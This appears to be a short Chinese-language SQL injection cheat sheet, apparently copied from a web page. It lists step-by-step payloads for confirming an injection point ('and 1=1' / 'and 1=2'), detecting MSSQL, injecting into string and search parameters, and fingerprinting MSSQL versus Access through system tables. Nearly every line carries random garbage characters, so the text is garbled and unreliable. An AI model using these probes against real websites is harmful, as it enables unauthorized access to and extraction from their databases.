1.判断是否有注入;and 1=1 ;and 1=2 ++ !BSQ e
2.初步判断是否是mssql ;and user>0 $r} )j~c
M; *f(JY$
3.注入参数是字符'and [查询条件] and ''=' +BcJHNIB
v#i,pBj
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 7N0V`&}T
.} <$2.
5.判断数据库系统 J{c-'Of2yi
boAu
;and (select count(*) from sysobjects)>0 mssql NFpR jC?
~*R"WiDtI
;and (select count(*) from msysobjects)>0 access b#cXn4<